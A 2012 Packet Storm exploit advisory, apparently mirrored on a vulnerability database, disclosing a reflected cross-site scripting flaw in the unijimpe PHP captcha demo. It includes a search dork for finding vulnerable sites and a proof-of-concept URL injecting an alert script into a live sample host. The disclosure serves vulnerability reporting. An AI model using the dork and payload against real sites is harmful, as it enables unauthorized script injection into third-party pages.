Unijimpe Captcha Cross Site Scripting

🗓️ 16 May 2012 00:00:00Reported by Daniel GodoyType

packetstorm🔗 packetstormsecurity.com👁 15 Views

Unijimpe Captcha XSS Vulnerability in Captcha Creation with PHP on Linu

`# Exploit Title: Captcha (unijimpe) XSS Vulnerability  
# Date: 15/05/2012  
# Author: Daniel Godoy  
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com  
# Author Web: www.delincuentedigital.com.ar  
# http://blog.unijimpe.net/crear-captcha-con-php/  
# Tested on: Linux  
# Dork: allinurl: "captchademo.php"  
  
[Comment]  
Greetz: MaztoR  
www.remoteexecution.info www.remoteexcution.com.ar  
#RemoteExecution Hacking Group  
  
  
  
[DEMO]  
  
http://samples.unijimpe.net/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
`

16 May 2012 00:00Current

0.5Low risk

Vulners AI Score0.5